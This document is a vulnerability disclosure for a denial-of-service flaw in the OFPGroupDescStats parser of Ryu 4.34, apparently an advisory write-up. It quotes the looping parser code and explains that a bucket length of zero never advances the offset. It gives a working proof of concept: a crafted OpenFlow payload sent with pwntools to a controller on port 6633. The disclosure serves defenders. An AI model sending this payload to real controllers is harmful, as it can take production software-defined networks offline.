An issue was discovered in OFPGroupDescStats in parser.py in Faucet SDN Ryu version 4.34, allows remote attackers to cause a denial of service (DoS) (infinite loop).

Ryu_OFPGroupDescStats.md

in /ryu/ofproto/ofproto_v1_3_parser.py about line=4685

class OFPGroupDescStats(StringifyMixin):
    @classmethod
    def parser(cls, buf, offset):
    ....
        while length < stats.length:
            bucket = OFPBucket.parser(buf, offset)
            stats.buckets.append(bucket)

            offset += bucket.len
            length += bucket.len

If OFPBucket.len=0,the offset and length will no longer change and the parsing will fall into an infinite loop.

payload:

brk=b"\x04\x13\x00\x38\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00"
brk+=b"\x00\x28\x00\x00"
brk+=b"\x00\x00\x00\x00"
bucket="00000001ffffffffffffffff000000000000001000000001ffe5000000000000"
# brk+=bytes.fromhex(bucket)
brk+=bytes.fromhex(bucket)

poc:

from pwn import *
p=remote("0.0.0.0",6633)
brk=b"\x04\x13\x00\x38\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00"
brk+=b"\x00\x28\x00\x00"
brk+=b"\x00\x00\x00\x00"
bucket="00000001ffffffffffffffff000000000000001000000001ffe5000000000000"
# brk+=bytes.fromhex(bucket)
brk+=bytes.fromhex(bucket)
p.send(brk)
p.interactive()

This POC uses OFPGroupDescStatsReply as an example. The OFPGroupDescStatsReply message will be accompanied by an OFPGroupDescStats structure, in which the length of OFPBucket is tampered with to 0.

This problem also occurs with the following code:

/ryu/ofproto/ofproto_v1_3_parser.py about line=4685

/ryu/ofproto/ofproto_v1_4_parser.py about line=2548

/ryu/ofproto/ofproto_v1_5_parser.py about line=5893